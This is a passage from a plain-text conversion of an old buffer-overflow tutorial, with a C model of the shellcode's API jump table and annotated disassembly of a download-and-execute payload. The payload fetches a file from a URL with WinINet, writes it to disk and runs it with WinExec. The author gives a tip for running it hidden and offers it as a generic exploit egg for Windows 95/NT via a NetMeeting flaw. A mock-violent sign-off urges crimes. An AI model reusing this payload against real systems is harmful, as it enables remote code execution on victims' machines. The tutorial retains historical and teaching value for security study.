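    {"KERNEL32", "_lcreat", 0xBFF77A10u},     {"KERNEL32", "_lwrite", 0xBFF77A40u},
    {"KERNEL32", "_lclose", 0xBFF77A70u},     {"KERNEL32", "WinExec", 0xBFF78B00u},
    {"KERNEL32", "ExitProcess", 0xBFF78E20u}, {"KERNEL32", "GlobalAlloc", 0xBFF76C00u},
    {"WININET", "InternetOpenA", 0x70201100u},    {"WININET", "InternetCloseHandle", 0x70201200u},
    {"WININET", "InternetOpenUrlA", 0x70201300u}, {"WININET", "InternetReadFile", 0x70201400u},
};
static uint32_t fake_LoadLibraryA(const char *dll) {
    return !strcmp(dll, "KERNEL32") ? 0xBFF70000u : !strcmp(dll, "WININET") ? 0x70200000u : 0;
}
static uint32_t fake_GetProcAddress(uint32_t hmod, const char *name) {
    const char *dll = hmod == 0xBFF70000u ? "KERNEL32" : hmod == 0x70200000u ? "WININET" : "";
    for (size_t k = 0; k < sizeof FAKE_EXPORTS / sizeof FAKE_EXPORTS[0]; k++)
        if (!strcmp(FAKE_EXPORTS[k].dll, dll) && !strcmp(FAKE_EXPORTS[k].name, name))
            return FAKE_EXPORTS[k].addr;
    return 0;
}

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void stosd(uint8_t *egg, size_t *edi, uint32_t v) {   /* store dword at EDI, EDI += 4 */
    for (int k = 0; k < 4; k++) egg[(*edi)++] = (uint8_t)(v >> (8 * k));
}

/* Obstacle #3 as the egg does it: decode, LoadLibraryA("KERNEL32"), six
 * lookups, LoadLibraryA("WININET"), four lookups. Returns the final EDI,
 * which every "call d,[edi-xx]" in the rest of the egg is relative to. */
static size_t build_jumptable(uint8_t *egg) {
    uint8_t enc[TABLE_LEN];
    memset(egg, 0, EGG_LEN);
    encode_table((const uint8_t *)TABLE_PLAIN, enc, TABLE_LEN);   /* what the .cnf carries */
    memcpy(egg, enc, TABLE_LEN);
    decode_in_place(egg + TABLE_LEN, TABLE_LEN);                  /* first thing the egg does */
    size_t ebx = 0, edi = JT_BASE;                                /* EBX -> "KERNEL32" */
    uint32_t esi = fake_LoadLibraryA((const char *)egg);
    for (int n = 6; n > 0; n--) {
        ebx = next_name(egg, ebx);
        stosd(egg, &edi, fake_GetProcAddress(esi, (const char *)egg + ebx));
    }
    ebx = next_name(egg, ebx);                                    /* EBX -> "WININET" */
    esi = fake_LoadLibraryA((const char *)egg + ebx);
    for (int n = 4; n > 0; n--) {
        ebx = next_name(egg, ebx);
        stosd(egg, &edi, fake_GetProcAddress(esi, (const char *)egg + ebx));
    }
    return edi;
}

/* slot_at(-0x14) is what "call d,[edi][-0014]" would call; str_at_is(-0x50, s)
 * checks the string the egg hands to InternetOpenUrlA, -0x2F the filename. */
static size_t   edi_final(void)   { uint8_t egg[EGG_LEN]; return build_jumptable(egg); }
static uint32_t slot_at(int disp) { uint8_t egg[EGG_LEN]; size_t e = build_jumptable(egg); return rd32(egg + e + disp); }
static int str_at_is(int disp, const char *s) { uint8_t egg[EGG_LEN]; size_t e = build_jumptable(egg); return !strcmp((const char *)egg + e + disp, s); }

/* Encoding checks: no 0x00 survives, 'K' -> 0xCB and the separator -> 0x80 as
 * in the page's second dump, and decoding restores the table. */
static int encoding_round_trips(void) {
    uint8_t enc[TABLE_LEN], dec[TABLE_LEN];
    if (!encode_table((const uint8_t *)TABLE_PLAIN, enc, TABLE_LEN)) return 0;
    for (size_t k = 0; k < TABLE_LEN; k++) if (enc[k] == 0) return 0;
    if (enc[0] != 0xCB || enc[8] != 0x80) return 0;
    memcpy(dec, enc, TABLE_LEN);
    decode_in_place(dec + TABLE_LEN, TABLE_LEN);
    return memcmp(dec, TABLE_PLAIN, TABLE_LEN) == 0;
}
```

Two things the model makes visible: the final EDI is 0xDD (0xB5 plus ten
four-byte slots), so [EDI-0x28] is _lcreat and [EDI-0x04] is
InternetReadFile, and InternetCloseHandle at [EDI-0x0C] is resolved but never
called by the egg. The table layout also explains the otherwise odd
displacements: EDI-0x50 lands on the 'h' of the URL and EDI-0x2F on the
"e.exe" tail that becomes the filename.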
    000001D6: 33D2                   xor edx,edx
    000001D8: 52                     push edx
    000001D9: 52                     push edx
    000001DA: 52                     push edx
    000001DB: 90                     nop
    000001DC: 52                     push edx
    000001DD: 8BD7                   mov edx,edi
    000001DF: 83EA50                 sub edx,050 ;"P"
    000001E2: 90                     nop
    000001E3: 90                     nop
    000001E4: 90                     nop
    000001E5: 52                     push edx
    000001E6: 50                     push eax
    000001E7: FF57F8                 call d,[edi][-0008]

This calls InternetOpenUrlA (at [EDI-0x08]) with our Internet handle and the
URL, which sits in the string table at EDI-0x50; the remaining four
parameters are zero. Since the code does not care what kind of URL it is, it
can be HTTP, FTP, FILE or GOPHER.

    000001EA: 57                     push edi
    000001EB: 33D2                   xor edx,edx
    000001ED: 664A                   dec dx
    000001EF: D1E2                   shl edx,1
    000001F1: 52                     push edx
    000001F2: 56                     push esi
    000001F3: 50                     push eax
    000001F4: FF57FC                 call d,[edi][-0004]

This calls InternetReadFile (at [EDI-0x04]) to download up to 131070 bytes
into our memory block (the ESI pointer). Note that we push EDI: that is where
InternetReadFile stores the number of bytes actually read, in the dword just
past the jumptable, and we need that count to write the file out with the
right length. It also means there is a limit on the size of the file the
exploit can download.

    000001F7: 90                     nop
    000001F8: 90                     nop
    000001F9: 90                     nop
    000001FA: 33D2                   xor edx,edx
    000001FC: 52                     push edx
    000001FD: 8BD7                   mov edx,edi
    000001FF: 83EA30                 sub edx,030 ;"0"
    00000202: 42                     inc edx
    00000203: 90                     nop
    00000204: 90                     nop
    00000205: 52                     push edx
    00000206: FF57D8                 call d,[edi][-0028]

This calls _lcreat (at [edi-0x28]) to create the file we will write our
memory buffer to. The filename is the last 5 characters of the URL, "e.exe"
in this case, found at EDI-0x2F; the second parameter, the attribute, is zero
(a normal file). The file ends up wherever the exploited process is running
(normally NetMeeting's SpeedDial directory).

    00000209: FF37                   push d,[edi]
    0000020B: 56                     push esi
    0000020C: 50                     push eax
    0000020D: 8BD8                   mov ebx,eax
    0000020F: FF57DC                 call d,[edi][-0024]

This calls _lwrite (at [edi-0x24]) to write the buffer to the file. The byte
count parameter is the dword at [edi], the count InternetReadFile stored
there; the file handle is the one _lcreat returned in EAX. We also copy that
handle into EBX, because we need it after this call.

    00000212: 53                     push ebx
    00000213: FF57E0                 call d,[edi][-0020]

And _lclose (at [edi-0x20]) closes the file handle to finish the write. The
download is done and the file is on disk. We should also free the memory and
close the Internet handles, but we are about to exit the process anyway, and
it works as it is.

    00000216: 90                     nop
    00000217: 90                     nop
    00000218: 90                     nop
    00000219: 33D2                   xor edx,edx
    0000021B: 42                     inc edx
    0000021C: 52                     push edx
    0000021D: 8BD7                   mov edx,edi
    0000021F: 83EA30                 sub edx,030 ;"0"
    00000222: 42                     inc edx
    00000223: 90                     nop
    00000224: 90                     nop
    00000225: 52                     push edx
    00000226: FF57E4                 call d,[edi][-001C]

Now we just call WinExec (at [edi-0x1C]) to run the file. Note the first
'inc edx': it sets the "show window" parameter to 1. If you want the program
to run hidden, replace it with a NOP: WinExec's second parameter is then
SW_HIDE (0) instead of SW_SHOWNORMAL (1). The first parameter is the filename,
the same EDI-0x2F string we gave _lcreat. Have fun with it!
    00000229: 90                     nop
    0000022A: 90                     nop
    0000022B: 90                     nop
    0000022C: FF57E8                 call d,[edi][-0018]

Time to kill the process. ExitProcess (at [edi-0x18]) takes care of that; no
exit code is pushed, which is harmless since ExitProcess never returns and
nobody looks at the value. And that's all.

;============================================================================;

@ That's it!

This code that I have explained can be used as an overflow egg for any Windows
95 or NT program. It is theorized to work in a Windows 98 environment. The
example Netmeeting 2.1 exploit that I used throughout this explanation is a
Win95 only flaw, but for other operating systems, the code, and technology
remains the same. The Netmeeting flaw is not patched as of this writing, but
expect it to be fixed sometime.

Learn. Experience. And send me all of your money.

Now you can start ruling the world. Have fun with this knowledge. Rob from the
rich, and rob from the poor. Eat your cat. Kill your parents. Blow up your
local elementary school. Rape young farm animals. Do whatever your sick and
twisted mind can fathom. And when you get caught, just tell 'em Satan made you
do it.

Oh yeah, and I almost forgot. Here's the whole toy put together.

;============================================================================;

This is DilDog's "The Tao of Windows Buffer Overflow". The original was HTML;
I converted it to plain text. I tried to reflect DilDog's intent as far as I
could, and left untranslated the places where DilDog's particular turns of
phrase would have lost their intent in translation. Please let me know if you
find mistakes. The copyright is not ours. You may freely copy, modify and
redistribute this.

__sucked by dufqks

;============================================================================;